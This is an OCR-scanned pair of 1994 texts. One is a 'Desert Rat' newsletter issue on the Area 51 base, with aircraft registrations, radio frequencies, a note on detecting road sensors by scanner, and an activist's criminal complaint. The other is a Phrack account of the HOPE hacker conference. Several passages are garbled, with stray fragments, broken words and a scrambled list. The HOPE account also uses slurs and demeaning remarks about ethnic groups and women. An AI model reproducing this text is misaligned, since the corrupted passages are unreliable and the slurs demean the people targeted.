----- JANET "N" NUMBERS ----- 


For aircraft watchers, here are the registration and serial 
numbers of Janet 737s and Gulfstream commuter planes spotted at 


the Janet terminal at McCarran airport. Based on observations in 
5/94 and the 4/30/94 FAA registry. One or more of the Janet 
aircraft are probably missing from this list. (We ask our readers 


to find them.) 


Boeing 737... 

Reg. #/Serial #/Owner 
N4508W 19605 Great Western Capital Corp, Beverly Hills 
N4510W 19607 Great Western Capital Corp, Beverly Hills 
N4515W 19612 Great Western Capital Corp, Beverly Hills 
N4529W 20785 First Security Bank of Utah, Salt Lake City 
N5175U) 20689 Dept. of the Air Force, Clearfield UT 
N5176Y 20692 Dept. o he Air Force, Clearfield UT 
N5177C 20693 Dept. of the Air Force, Clearfield 


a) 


Fh Fh t 
ct 


Gulfstream C-12... 
N20RA  UB-42 Dept. 


of the Air Force, Clearfield UT 
N654BA BL-54 Dept. of the Air Force, Clearfield UT 
N661BA BL-61 Dept. of the Air Force, Clearfield UT 
N662BA BL-62 Dept. of the Air Force, Clearfield UT 


| 

| 

| 

| 
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ET HANDOFF FREQUENCIES -—--- 


A DESERT RAT EXCLUSIVE! Published here for the first time are the 
air traffic control frequencies for the "Janet" 737 crew flights 
from Las Vegas McCarran Airport to Groom. The McCarran freqs are 
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public, but the Groom ones have not been revealed until now. Air 
traffic control broadcasts are "in the clear" and any scanner 
radio should be able to pick them up. Each of these freqs has 
been personally confirmed by Psychospy or a close associate. 


121.9 McCarran Ground Control 
119.9 McCarran Tower 

133.95 Departure Control 
119.35 Nellis Control 

120.35 Groom Approach 

127.65 Groom Tower 

118.45 Groom Ground 


Here are some other Groom fregqs (some of which were previously 
reported in DR #8). The security frequencies are usually 
scrambled, but not always. 


418.05 Cammo Dudes (primary) 

408.4 Cammo Dudes (repeat of 418.05) 

142.2 Cammo Dudes 

170.5 Cammo Dudes (Channel 3) 

133-23 "Adjustment Net" (seems related to security) 
261.1 Dreamland Control (published) 

2 59659 Groom Tower (repeat of 127.65) 

154.86 Lincoln County Sheriff 

496.25 Road sensors on public land 

410.8 Pager (apparently from Groom but unconfirmed) 


The most accurate way to detect a road sensor (AFTER you have 
tripped it), is to program 496.25 into several channels of your 
scanner, then scan those channels exclusively as you are driving. 
When the scanner stops on one channel, you have just passed a 
sensor. 


-SSce GROOMSTOCK '94 ----- 


The "Freedom Ridge Free Speech Encampment" went pretty much as 
planned, with at least sixty people in attendance but not all of 
them staying for the night. There were no surprises and, sadly, 
no confrontations with the authorities when we whipped out our 
cameras and pseudo-cameras to point at the secret base. The Cammo 
Dudes were visible but kept their distance, and the only authority 
figure to show up on the ridge was a BLM Ranger in a Smoky-the- 
Bear hat. He was concerned only that we clean up our trash, and 
he warned us, by his very presence, that "Only You Can Prevent 
Forest Fires." 


The event was recorded in an 8/29 article in the Las Vegas Review- 
Journal, which dubbed it "Groomstock." [The article may be 
available at the FTP site.] We were disturbed to read in the 
paper that the attendees included some "marijuana-smoking 
slackers." We called around and found out it was true and that it 
happened after Psychospy went to bed. Had we known, we would have 
quashed it immediately. This sort of thing discredits our ability 
to police ourselves and hurts the reputation of the land grab 
opponents. 


The hot gossip around the campfire was about the Review-Journal 
reporter and the loony in the tie-dyed shirt. The loony had spent 
about an hour moving rocks and dirt around to make himself a 
comfortable bed, then he blew a conk-shell horn and banged cymbals 
together to bless it. When the reporter arrived, he volunteered 
to make a bed for her, too, not far from his own, and he proceeded 
with the project without any encouragement. It is unknown why he 
singled her out for this special honor, but evidently she was 
"chosen." It should be noted, however, that while blessing the 
reporter’s bed, the loony accidentally dropped one of the cymbals. 
We forget to check with the reporter in the morning to see if that 
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omen affected the quality of her nighttime experience. 
—--=+ SOUND FAMILIAR? ----- 
From an AP news story printed in the 8/5 Review-Journal... 
"PORT-AU-PRINCE, Haiti -- Authorities deported an American TV 
crew Thursday, putting the three journalists in an open pickup 


truck, parading them through the capital and then dumping them at 
the Dominican border.... 


"Soldiers detained the freelance journalists for PBS’s ’The 
MacNeil/Lehrer Newshour’ on Sunday while they were filming at 
Port-au-Prince’s airport. Three of their videotapes were 
seized.... 


"The military-backed government has urged journalists not to 
report ’alarmist’ news and has attempted to restrict news 
coverage.... 


"’T think it’s deplorable, and it’s obviously an attempt to 


embarrass them,’ [U.S.] Embassy spokesman Stanley Schrager told 
The Associated Press. ‘’This treatment was not necessary; neither 
was the deportation.... It’s a transparent attempt by this 


illegal regime to interfere with the free flow of information.’" 


In related news, the four of the five video tapes seized on July 
19 from KNBC-TV have still not been returned. The tapes were 
taken without a warrant after the crew filmed an interview on 
Freedom Ridge but not the Groom base itself. Activist Glenn 
Campbell, who accompanied the crew, was arrested when he attempted 
to interfere with this seizure. 


SSS CAMPBELL ARRAIGNED ----- 


Activist Glenn Campbell reports that his Aug. 24 arraignment on 
obstruction charges was "amicable." Charges were presented, but 
the District Attorney did not appear. The complete text of the 
charges, stemming from the July 19 KNBC incident, reads as 
follows... 


Case No. P55-94 


IN THE JUSTICE COURT OF THE PAHRANAGAT VALLEY TOWNSHIP 
IN AND FOR THE COUNTY OF LINCOLN, STATE OF NEVADA 


5 


CRIMINAL COMPLAINT 


STATE OF NEVADA, Plaintiff, 
vs. 
GLENN P. CAMPBELL, Defendant. 


STATE OF NEVADA ) ss. 
County of Lincoln  ) 


DOUG LAMOREAUX, being first duly sworn and under penalty of 
perjury, personally appeared before me and complained that on or 
about the 19th of July, 1994, in Lincoln County, State of Nevada, 
the above-named Defendant, GLENN P. CAMPBELL, committed the 
following crime: 


COUNT 1 


OBSTRUCTING PUBLIC OFFICER, a violation of NRS 197.1990 and LCC 
1.12.010, a MISDEMEANOR, in the following manner: 
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The Defendant did, then and there, after due notice, willfully, 
hinder, delay or obstruct a public officer in the discharge of his 
officer powers or duties. Specifically, the Defendant did, then 
and there, after due notice, willfully hinder Sergeant Doug 
Lamoreaux in the discharge of his official duties by locking the 
doors of the vehicle which Sergeant Lamoreaux was retrieving 
certain items from and further refused to unlock the doors after 
being requested to do so by Sergeant Lamoreaux. 


All of which is contrary to the form of Statute in such cases made 
and provided and against the peace and dignity of the State of 
Nevada. The complainant, therefore, prays that a Warrant be 
issued for the arrest of the Defendant, if not already arrested, 
so that he may be dealt with according to law. 


[Signed] 

DOUG LAMOREAUX 

Sergeant 

Lincoln County Sheriff’s Department 


SUBSCRIBED and SWORN to before me 
this 24th day of August, 1994 
[Signed] NOLA HOLTON 

NOTARY PUBLIC/JUSTICE OF THE PEACE 


The only surprise in these charges is the line "and further 
refused to unlock the doors after being requested to do so by 
Sergeant Lamoreaux." That is not how Campbell recalls the 
incident. DR#12, published less than 12 hours after the incident, 
reported it as follows... 


"At this point Campbell, who had been standing on the opposite 
side of the vehicle, reached in and pushed down the door locks on 
the side that Lamoreaux was approaching. 


"Lamoreaux said, ’You’re under arrest.’ Campbell was 
immediately handcuffed and placed in Deputy Bryant’s vehicle." 


Campbell claims that Lamoreaux said, "You’re under arrest," 
IMMEDIATELY after he pushed down the door locks, with no request 
being made to unlock them. Campbell says he has two other 
witnesses, the KNBC crew, who can verify his story. In this case, 
where the basic recollection of facts is in conflict, it will be 
interesting to see what the second officer, Deputy Kelly Bryant, 
will say under oath. 


However, the core of Campbell’s defense rests on Constitutional 
issues. He is guilty of obstruction only if the officer was 
indeed engaged in the "lawful" execution of his duties. lLamoreaux 
justified his warrantless search by citing, in vague terms, a 
certain Supreme Court ruling, the name of which he could not 
recall at the time. That ruling is apparently in the case "Ross 
vs. U.S." which allows the warrantless seizure of "contraband" 
from a vehicle when there is a danger of flight. It is unclear at 
this point whether the video tapes of a news crew constitute 
contraband in the same manner as a shipment of marijuana or stolen 
merchandise. Complex First Amendment issues may be invoked. The 
case may be further complicated by the repeated offer by the TV 


reporter to allow Lamoreaux to view the video tapes himself. 


Campbell has requested, and has been granted, a jury trial. 
According to the Justice, this will be the first jury trial held 
in this court since about 1987. Campbell announced his intention 
to represent himself at the trial, with possible legal co-council. 
A tentative trial date of Oct. 25 has been set, but it is likely 
to be postponed. Campbell indicated that he will waive his right 
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to a trial within 60 days to allow more time to conduct legal 
research. 


a a! LARRY KING NOT CLONED? ----- 


Our report in DR#13 about the diversion of Larry King’s plane to 
Nellis AFB continues to disturb many of our readers. It raises 
the specter of secret contacts between King and the military or 


even a surreptitious replacement of the talk show host by a look- 
alike clone. Now, we wonder if our panic was only a false alarm. 
A producer from a Las Vegas TV station tells us: "I checked into 


it and think it is legit. According to the FAA, McCarran Airport 
was never really closed, but they did have pilots choose not to 
land on that Saturday afternoon because of inclement weather. 

They also confirm that there is an agreement with Nellis to allow 
planes in trouble to land there. I spoke to the control tower at 
McCarran. They checked their records, and they indicate that on 
that Saturday a nasty thunderstorm was noted by the tower at 1:45- 
2:05. In fact, four takeoffs were delayed during that time due to 
weather. Planes in the air just flew holding patterns until the 
weather cleared." 


Presumably, King’s plane didn’t have enough fuel to maintain the 
holding pattern. Thunderstorms can be very localized, and perhaps 
Nellis was clear. A producer at Larry King Live says that, in her 
opinion, he is definitely the same Larry King. She says he got 
the military escort because he was late for a speaking engagement 
and made his wants known on the plane. 


So what can we say? Obviously, the FAA, the TV station and the 
King producer ARE PARTIES TO THE CONSPIRACY. This story is deeper 
than it seems, and the Rat will pursue the investigation for as 
long as it takes. THE TRUTH IS OUT THERE. 


Seay MYSTERIOUS SIGN DISAPPEARANCE ----~— 


The big "No Photography" signs on the Groom Lake Road have 
disappeared. For over a year, they were installed on public land 
about two miles from the military border, but sometime in the 
first week of August they were cleanly removed, posts and all, 
apparently by the Air Force. (A civilian thief--like SDM, who has 
a number of these signs in his possession--would have simply 
unscrewed the signs, not uprooted the heavy posts and carefully 
filled up the holes.) The two signs on either side of the road 
were each about 3 feet by 4 feet and bore the following text: 


WARNING: THERE IS A RESTRICTED MILITARY INSTALLATION TO THE WEST. 
IT IS UNLAWFUL TO MAKE ANY PHOTOGRAPH, FILM, MAP, SKETCH, PICTURE, 
DRAWING, GRAPHIC REPRESENTATION OF THIS AREA, OR EQUIPMENT AT OR 


FLYING OVER THIS INSTALLATION. IT IS UNLAWFUL TO REPRODUCE, 
PUBLISH, SELL, OR GIVE AWAY ANY PHOTOGRAPH, FILM, MAP, SKETCH, 
PICTURE, DRAWING, GRAPHIC REPRESENTATION OF THIS AREA, OR 


FQUIPMENT AT OR FLYING OVER THIS INSTALLATION. VIOLATION OF 
EITHER OFFENSE IS PUNISHABLE WITH UP TO A $1000 FINE AND/OR 
IMPRISONMENT FOR UP TO ONE YEAR. 18 U.S. CODE SEC. 795/797 AND 
EXECUTIVE ORDER 10104. FOR INFORMATION CONTACT: 

USAF/DOE LIAISON OFFICE 
PO BOX 98518 
AAS VEGAS, NV 89193-8518 


5 


T! 


The signs first appeared in May 1993 shortly after WFAA-TV from 
Dallas took video of the base from White Sides. (When challenged 
by the Sheriff, they admitted photographing the base but managed 
to retain their tape.) The signs were removed in Aug. 1994 
shortly after KNBC-TV from Los Angeles lost their video tape after 
NOT photographing the base. It is unclear why the AF removed th 
signs. Perhaps they have become a little smarter and are adopting 
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a "don’t ask, don’t tell" policy toward photography (but we 
wouldn’t want to be the ones to test that theory). The signs 
themselves had become a tourist attraction, and no visitor could 
resist having their picture taken beside them. 


At the same time the "No Photography" signs vanished, the 
misplaced "Restricted Area" sign also went away. This is the 
crossed out sign seen in the NYT article, where the "stupid 
faggot" comment had later been written and then erased (DR#12,13). 
God, we’ll miss that sign! It was as illegal as hell--—being on 
public land--but an old friend to us nonetheless. 


At least now we can assure the public: If you see a Restricted 
Area sign, it’s real and they mean it. 


Seo, INTEL BITTIES ----- 


ENCOUNTERS TRANSCRIPT. Complete, unedited transcripts (not just 
the sound bites) of the interviews in the 7/22 Encounters show 
(DR#10) are available to Compuserve users. Type GO ENCOUNTERS, 
and look under "Browse Libraries" and "Interview Transcripts." 
Interviews include Rep. James Bilbray (file FREED2.105), Agent X 
(FREED1.105) and Glenn Campbell (FREED3A.105, FREED3B.105). This 
is a transcript for video editing, so every "Um" and "Ah" is 


recorded. 


5 


5 


x 


NEW GUARD FACILITY. We send our congrats to the Dudes on their 
newly constructed prefab building next to the guard house on Groom 
Lake Road (about a half mile inside the border). Apparently, they 
are expecting more business along this part of the border and need 
a new substation. Interested taxpayers can view the new building 
from the first hill on the hiking trail to F.R. ("Hawkeye Hill"), 
a location that will continue to be public even if F.R. is taken. 


UPCOMING TV SEGMENTS. UNSOLVED MYSTERIES will broadcast a show on 
UFOs with a segment on Area 51 on Sunday, Sept. 18 at 8pm. The 


broadcast wil include a new interview with Bob Lazar. THE 
CRUSADERS will broadcast a segment on UFOs, including a visit to 
F.R., on Sept. 10 or 11 (date and time vary by city). Air date 


for THE MONTEL WILLIAMS SHOW taped on Aug. 23 has not been 
confirmed, but it could be the week of Sept. 12. 


===== SUBSCRIPTION AND COPYRIGHT INFO ===== 
(c) Glenn Campbell, 1994. (psychospy@aol.com) 


This newsletter is copyrighted and may not be reproduced without 
permission. PERMISSION IS HEREBY GRANTED FOR THE FOLLOWING: For 
one year following the date of publication, you may photocopy this 
text or send or post this document electronically to anyone who 
you think might be interested, provided you do it without charge. 
You may only copy or send this document in unaltered form and in 
its entirety, not as partial excerpts (except brief quotes for 
review purposes). After one year, no further reproduction of this 
document is allowed without permission. 


Email subscriptions to this newsletter are available free of 
charge. To subscribe (or unsubscribe), send a message to 
psychospy@aol.com. Subscriptions are also available by regular 
mail for $15 per 10 issues, postpaid to anywhere in the world. 


A catalog that includes the "Area 51 Viewer’s Guide", the Groom 
Lake patch and hat and many related publications is available upon 
request by email or regular mail 


Back issues are available on various bulletin boards and by 
internet FTP to ftp.shell.portal.com, directory 
/pub/trader/secrecy/psychospy. Also available by WWW to 
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http://alfredl.u.washington.edu: 8080/7 roland/rat/desert_rat_index. 


html 


Current circulation: 1440 copies sent direct] 


ly to subscribers 


(plus an unknown number of postings and redistributions). 


The mail address for Psychospy, Glenn Campb 
Council, Area 51 Research Center, Groom Lake 
countless other ephemeral entities is: 

HCR Box 38 

Rachel, NV 89001 USA 


tit 


ll, Secrecy Oversight 


Desert Rat and 
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HOPE 
by 
Erik Bloodaxe 


— 


I was a little apprehensive about going to HOPE. I’d been warned for months 
that "If you go to HOPE, you are going home in a body bag," and "I am 

going to kick your fucking ass at hope," and "If you go, you’re gonna get 
shot." 


Needless to say I found this a bit unnerving. As big an ego as I may have, 
it still does not repel hot lead projectiles. Add this to the fact that my 
best friend of 10 years was murdered by some random idiot with a pistol in 
fucking pissant, Bible-thumping Waco, TX a few months back. Waco. And the 
shooter wasn’t even a Davidian, just a drugged-out 16 year-old. If the 
kids pack heat in Waco, I know they must come standard issue in New York. 


But, hell, I’ve haven’t missed a con in ages. Could I actually miss 
a SummerCon? Especially the SummerCon commemorating the 10th 
anniversary of 2600 Magazine? Could I? 


Like an idiot, I make my reservations. Ice-9, who was stuck with a 
leftover ticket on United, traded it in and we were both off to New York. 


We arrived late Friday night. So there we were: The Big Apple, Metropolis, 
The City that Never Sleeps. Unfortunately, it never showers or changes 

its clothes either. Why anyone in their right mind would want to come 

to New York City boggles the mind. It sucks. I mean, I’ve been damn 

near everywhere in the United States, I’ve been to major cities in Mexico, 
Canada and Europe, and New York is by far and away the worst fucking 
shithole I’ve seen yet. I don’t know for certain, but Port au Prince 
probably has more redeeming qualities. 


I figured out within a few minutes why New Yorkers are such assholes too. 
First, no one seems to be from New York exactly, merely transplants from 
somewhere else. So what has happened is that they bought into New York’s 
superb public relations campaign and sold off all their belongings to get 
their ticket to America and the land of opportunities. So, they find 
themselves in NYC with about half a billion other broke, disillusioned 
immigrants wading in their own filth, growing very pissed off at being sold 
such a bill of goods. 


It would piss me off too. And I’m sure our cab driver that night missed his 
family’s ancestral thatched hut back in good old Bangladesh. But luckily for 
him crack provides a good short-term solution. Not to mention excellent 
motor skills. 

Twenty-five near misses, and a lengthy carhorn symphony later, we managed to 
arrive at the Hotel Pennsylvania intact. The hotel, heralded in legend and 
lore had seen better decades. About the only thing it had going for it was 
one of the oldest phone numbers in the city. PEnnsylvania 6-5000. 
(Ta-da-dum-dum) I think if Glen Miller were alive today, his band members 
would kick his ass if he told them they had to sleep there. 


For a hundred dollars a night, Ice-9 and I were treated to two less than 
jail-house sized beds, a tv that almost worked, and a hardwired telephone 
(ie: no modular jacks in sight.) In addition, the entire room was stained 
from floor to ceiling, and most of the wall paper by the window had peeled 
halfway down. The window itself opened to a miraculous view of the trash 
12 floors down. We debated on throwing every single object in the room 

out the window for a little excitement, but decided it might injure some of 
the homeless below. 
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Anxious to get the hell out of our little cell (well, the prisons I’ve had 
the misfortune to sleep in were in better repair) Ice-9 and I took off to 


the top floor and the HOPE conference area. 


I don’t know why Emmanuel decided to call this conference 


been called HOPE. 


HOPE and HEU: 


Both heavily orchestrated by 2600 and Hack-Tic 
Both had in-house networks 
Both had token "fed" speakers 


mw wN FR 


"Hackers On Planet 


Barth." This conference had more right to the title "Hacking at the End 
of the Universe." Perhaps even "Hacking in the Cesspool of the Earth." 
HEU was in the middle of nowhere, but it was pretty and happy. It should have 


In fact, as the days went on, I noticed a number of similarities between 


Both had seminars on boxing, pagers, social engineering, history, 


UNIX, cellular, magnetic cards, lock picking, 


legal i 


Both drew extensive press attendees 
Both charged more than any other conferences. 
Both had over a thousand attendees 


Both tried far too hard to be technical 
New York used to be New Amsterdam 


But I digress... 


Anyway, the network room was beginning to shape up quite n 


is) 
6 
Tee 
8. Both used computer equipment to make photo badges 
9 
0 


(HOPE 


icely. 


ssues, etc. 
25, HEU 50) 
Young 


hacklets were already clicking away at their keyboards, oblivious to 
all the way to 
New York to sit in front of a screen and type all by their lonesome 


anything else save their screens. Why anyone would travel 


left me stymied. Isn’t that what we all do back at home? 


The first people we ran into were Winn Schwartau and Bootl 
be wrong, but I think a large factor in Winn’s showing up 


eg. I 


at HOPE 


could 
was 


to watch me get shot and write about it. He told me his article would 


be titled, "Cyber-Christ gets nailed to the Cross." Bootl 
here to raise a little hell. And goddamnit, so were we! 


eg, however, was 


Hacker conferences have always been an excuse for people who only knew 
each other over the phone and over the networks to actually meet face to 


face and hang out. Anyone who tells you "Conferences toda 


y suck, 


there isn’t 


enough technical inpho," is a clueless fuck. You do not go to a conference 
expecting to learn anything. If you don’t already know, chances are pretty 
damn good that the people who do won’t tell you. You learn by doing, not by 


sitting in an audience at some hacker con. Get a beer, ma 


ke som 


new friends, 


and THEN maybe you might pick up something in casual conversation, but at 
least you will have a good time getting sloshed with new people who share 


common interests. The only people who will learn something from 
hacker conferences are journalists who will then go on to write even 
more scathing sensationalist pieces about how hackers will destroy 
your credit and eavesdrop on your phone. Is that what we really 
want? 


Me, Ice-9, Bootleg, Bootleg’s friend from Oregon, and Thomas Icom took off 
to drink and see what debauchery lay waiting for us in Times Square. 


(Yes, it was a very, very, very mismatched looking group.) 


Icom, 


armed 


with ever-present handheld scanner, kept a continual broadcast of NYPD’s 


latest exploits. 


We ended up hanging out on the fringes of Times Square at some sidewalk 

deli bullshitting about anything and everything. A recurring topic throughout 
the whole weekend was EMP and HERF weaponry. I don’t particularly know 

if anyone in the underground would more excited by setting off one of these 
devices, or merely being able to brag to everyone that they were in possession 


of one. 


We sat talking about the ramifications of setting off some such device on 
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the roof of the building we were sitting in front of. The thought of 

all the neon and electronics surrounding us simultaneously ceasing to 
function and imploding at the logic gate level provided for at least an 
hour of hacker masturbation material. Bootleg reminisced about trying to 
track down decommissioned military radar equipment back in the early 80’s 
for just such a project. "I’m surprised it’s taken this long for the 
underground to get up on this stuff," he said. 


As we headed back to the hotel, we passed by the coolest vehicl ver 
seen by hacker eyes. The 2600 van was an exact replica of a NYNEX 

van, with the subtle addition of the magazines moniker instead of 
NYNEX, and a ball-capped hack-type tapping away on a notebook computer, 
plugged into the bell logo. It was truly a sight to behold. I began 
to drool. All Phrack has is a beat up, red Toyota Corolla. 


Up in the network room those that were not deeply engrossed in hacking 
the hope.net linux box wer ither already plowed (Hi Torquie!) or about 
to be. 


It was late, so we decided to crash. 


Ice-9 and I managed to wake up at a reasonable hour, and took off to 
see the city. I had seen an electronics store the night before, and 
had been looking for a PAL-NTSC-SECAM VCR for ages. I found it. 

New York’s only saving grace (well, except the huge amount of 
businesses there all screaming for security work) was cheap consumer 
electronics. For 380 bucks I got a VCR that not only converted on the 
fly between any tape format, but also had a digital freeze frame 

for thos lusive screen captures. I was stoked. 


After some food, we headed back up to the conference. The buzz was 
someone had several hundred cell phones confiscated by Cellular One 
reps after he off-handedly remarked that he would clone them 

to a potential buyer. I then ran into two of my friends from WAY back 
in the early 80’s: Tuc and Agrajag. Ag is an amazing guy. Not only 
was he fantastic way back then, he went on to write UNIX for Commodore, 
pull stints at places like USL, and is now working with speech 
recognition and wireless networking. Yet another fin xample of 

those ne’er-do-well Legion of Doom guys the government always 

frowned upon. Right. 


Later that afternoon, as I’m talking to someone in the network room, I feel 
someone bump into me. "Oh, sorry," says the person, and I go on with my 
conversation. A few seconds later, it happens again. Same guy, same 

"Oh, sorry." When it happens a third time I shove the guy back, and 

say, "Man, what the hell is your problem." Mistake. I look up straight 
into the eyes of a guy about 7 feet tall and 2 feet wide. Well, I’m 
exaggerating but it sure seemed that way at the time. All of a sudden 

IT am an extra in the Puerto Rican version of "Of Mice and Men." 

"De Ratones Y Hombres" 


The first guy was about 5 feet tall, and scurried around within an arms 
reach of the big guy. Immediately I realize that if I do ANYTHING, this 
big dude is more than ready to fuck me up, so the little guy must be a 
diversion. The big guy grunts and begins to maneuver around me. 

The little guy then takes his cue and begins pushing me, all the while 
asking "What’s your name? What’s your handle?" I keep backing up keeping 
an eye on the big guy, who is staring daggers at me. Well, at least with 
his one good eye. His lazy eye, stared daggers at the wall, the carpet, 
and a few other places. 


Meanwhile, this little event has gathered the interest of many in the con. 
People began to gather around to see Erik Bloodaxe finally get beat down. 
Unfortunately for the would-be spectators, several others tried to intervene. 
Tuc and a few of the other larger attendees went up to the big guy and 
attempted to hold him back. This only succeeded in him letting out a 
roar-like sound as he shrugged them off and continued coming towards me. 
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Finally, I say to the little guy, who has been engaging me in what was 
basically the equivalent of the mosh pit at a Barry Manilow concert, 

(One fucked up guy running into people who don’t want to play his game) 
"I’m Chris Goggans, who the hell are you?" To which he yells, "I’M JULIO!" 


Julio, aka Outlaw, aka Broken Leg, was one of the MOD members who was 
raided by the FBI and Secret Service some years back. While all 

his MOD brethren served jail time, Julio worked out a deal with the 
prosecutors in which he sold out his friends by agreeing to provide 
state’s evidence against them should the cases go to court. 


And I’m the bad guy? 


Fuck, all I ever did was try to keep my business running free of 
interruptions from disgruntled, jealous teenagers. I never turned state’s 
evidence against my best friends to save my own ass. What am I, Agent Steal? 


At this point everyone rushed in-between us and whisked Julio and his 


lazy-eyed, neandrethal boyfriend out the door. (Notice, I can call him 
all kinds of names now, because I’m back home in Austin, several thousand 
miles away.) I still have no idea who the big guy was. 


From now on, those of you who sincerely want to kick my ass, have the 
nerve to do it by yourself. I mean, I only went as far up as green in 
Tae Kwan Do, but that was far enough to learn the sacred truth, "Never 
take on more than ONE person or you will get the shit kicked out of you." 
Leave your boyfriends at home and be a man. If I have the balls to 

go thousands of miles away from home an enter the DMZ expecting to get 
shot, then you should have the balls enough to do something on your own. 
And remember: take the first swing. 


Shortly after "the incident" as it came to be called, by everyone who 
approached me about it afterward, me, Winn, Dave Banisar, and Robert Steele 
took off to find food. Steele decided we needed female accompaniment, 

so he invited a reporter from Details. She brought along her camera crew, 
who had been taking so many pictures around the con, one would think 

they owned Polaroid stock. 


Robert Steele is an interesting character. After a 20 year CIA tour he went 
on to found Open Source Solutions, a beltway operation that uses public 
sources of information to build intelligence dossiers. He described 
himself as "a short, fat, balding old-guy." This is like Rush Limbaugh 
calling himself "a harmless, loveable little fuzzball." Their self-imag 

is a bit removed from reality. Steele carries himself with the air of 

a spy. It’s kind of hard to explain, but it would be easy to see Steele 
excusing himself from dinner, killing three guys in the alley, and coming 
back for a piece of apple pie without an accelerated heartbeat or breaking 

a sweat. 


On top of being so immersed in the spy game, and having been in charge of 
the design and implementation of the CIA’s data center, Steele takes th 
severely radical viewpoint that hackers are America’s most valuable 
resource, and should be put to productive use rather than jailed. This 
man needs to come to more cons. 


Dinner was odd to say the least. The media people sat together, somewhat 
removed from us. They said approximately 5 words to us the whole time, 
possibly feeling somewhat bored by our drunken computer revelry. 

The reporter seemed visibly disturbed by all of us, and the guys 

looked like they would be more comfortable sitting in a coffee shop 
listening to Tom Waits while having a hearty debate over "Freud vs. Jung." 


Our discussions got louder and louder as the scotch flowed, and 

by the end of the evening most of the restaurant had heard such topics 

as "The CIA does most of its recruitment in the Mormon church," and 
"licking the floor at a Times Square peep show." By the time the check 
came the Details people were more than happy to pay more than their share 
of the bill to get the hell out of Dodge. A word of advice: always 
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get separate checks when dining out with any of us. 


Back in the hood, everyone was milling about waiting for the 

History of 2600 panel to begin. There was some kind of problem with 

one of the displays, so people were beginning to grow restless. Right 
about then one of the best looking girls at the con wandered by. Taking 

a guess, I asked her, "Are you Morgen?" She was. It’s almost unbelievable 
that someone who would waste time hanging out on IRC and who can actually 
interview for highly technical jobs could look like this. 


Morgen, Earle, Mr. Fusion, Ixom and Garbage Heap were heading out to 
get drunk, all of them rather disgusted by the regular con attendees. 
They invited me, so I tracked down Ice-9, who by that time was so ready 
for a pint of Guiness you could almost see the Harp Logo showing up 

on his skin like drunken stigmata. 


We ended up across the street at a little pub called the Blarney Rock. 
Pitchers drained like sieves, kamikazes dropped like WWII and tequila shots 
went down like Mexican whores. Everyone was in agreement that this 

was the best time any of us had experienced at HOPE. In between everyon 
drinking, and leering at Morgen, we actually talked about hacking stuff too. 
Gee, and we weren’t even on a panel! 


As the night progressed, almost everyone from the con ended up at the Blarney 
Rock. The con took the place over. The Blarney Rock probably made 

more money that night than they had any night in recent history. 

Everyone actually mingled, talked, planned and plotted. Plans were thrown 
around for the next PumpCon (Boston?), everyone talked about "the time 

they were busted the first time," Steele showed up wearing a Chinese 
Communist Cap, Fusion cursed at passers by in Korean and almost started 

an incident, Lucifer 666 relayed in vivid detail his ex-girlfriend’s 
Fallon-esque ability (much to the shock and envy of everyone listening), 
Count0O told his decapitated dog story, and there was much rejoicing. (YAY!) 


As the night went on, Ice-9 and I decided now was the time to actually 
check out the seedy underbelly of Times Square. At 1:00 in the evening. 
Alone. Drunk. Wid yed out-of-towners staggering up side streets in 
one of New York City’s sleaziest areas. 


Within a few minutes of hitting 42nd and 7th, we were approached by a 
street hustler. "Yo, what you need? Crack? Smoke? H? You like young 
girls? What you need, mah man?" Ice-9, in his drunken glory, "Yo man, 
you don’t know who the fuck you’re dealing with! I’m the biggest fucking 
felon in the whole goddamn world. You don’t have shit that I couldn’t 
get, and probably don’t already have." The hustler took a double-take 
and said, "Yo, I likes your style." Ice replied, "You damn Skippy!" 


Shortly thereafter, another hustler showed up. "Yo man, you want crack? 
I got the rock right here." Ice looked at him and said, "Man, if I smoke 
any more crack tonight, I’m going to fucking explode." The dealer went 
away fast. 


Times Square isn’t quite as sleazy as it’s made out to be actually. 

I’ve been in worse. It does, however, have the most extensive and 
cheapest collection of European smut this side of Copenhagen. In fact, 
the same movies from Holland would have cost 40 American dollars more in 
Holland than they did in New York. Beyond that, Times Square had little 
to offer anyone. That is, unless you wanted to spend a buck ina 

really sleazy peep show to grope some crack whore. I think not. 


Somehow, we made it back to the Blarney Rock alive, only to find that they 
had kicked everyone out. We headed back to our cell and passed out. 


The next morning, I came to early and wandered around the hotel. The second 
floor had caught on fire recently, and one wing was completely 

barbecued. All the gutted rooms were unlocked and the phones worked. 

God only knows why people weren’t using these rooms as squatter’s pads, 
considering how broke most hackers are. 


22 .txt Wed Apr 26 09:43:41 2017 6 


The main ballroom in the hotel was very cool. It was easy to see how 
at one point in time the Pennsylvania was quite a sight to behold. 

I suppose it was much like New York itself in that respect: Once 

a marvel of the modern world, now a festering sore crying out for 

a good cleaning and some antibiotic. 


We left New York at noon that day, and did not even get the chance to 
see the numerous panels scheduled for that day. With my complete absence 
from any panel it’s doubtful I would have made it anyway. 


So, did I like HOPE? Yes. I like cons for what they should be: 

a chance to hang out in person with your idiot online friends. Hackers 
are an odd bunch. We are all basically a bunch of self-involved, 
egomaniacal, borderline-criminal attention-seekers. Rarely, if ever, 
can we expect to meet anyone stupid enough to share our interests. 
Normal citizens, with whom most of us share absolutely no common frame 
of reference, look at us as if we were Martians. Even those 
computer-literate folk who talk geekspeak and understand most of 

what we are saying are left in the dark when we begin babbling 

about breaking into anything. 


Collectively, we are all fools, and without the opportunities of 

any social interaction with our peers, we will all fall prey to fear, 
uncertainty and doubt regarding each other. We had the social aspect 
many years ago in the early 80’s with the proliferation of BBSes and 
teleconferences. Now, much of that interaction is lost. Compared to 
our subculture’s "Golden Age," the teleconferences and BBSes that exist 
today are a pale reflection of the ones of yesterday. All we have is 
the inane banter provided by IRC and the occasional con. 


Our only hope is each other. 


See you all at Summercon 1995 - Atlanta, Georgia. 
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==Phrack Magazine== 


Volume Five, Issue Forty-Six, File 23 of 28 
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Cyber Christ Bites The Big Apple 
HOPE —- Hackers On Planet Earth, 
New York City - August 13-14, 1994 
(C) 1994 Winn Schwartau 
by Winn Schwartau 


(This is Part II of the ongoing Cyber Christ series. Part. J, 
"Cyber Christ Meets Lady Luck" DefCon II, Las Vegas, July 22-24, 
1994 is available all over the ‘/Net.) 


Las Vegas is a miserable place, and with a nasty cold no less; it 
took me three weeks of inhaling salt water and sand at the beach 
to finally dry up the post nasal drip after my jaunt to DefCon 
II. My ears returned to normal so that I no longer had to answer 
every question with an old Jewish man’s "Eh?" while fondling my 
lobes for better reception. 


New York had to be better. 


Emmanuel Goldstein -aka Eric Corely - or is it the other way 
around? is the host of HOPE, Hackers on Planet Earth, a celebra\037 
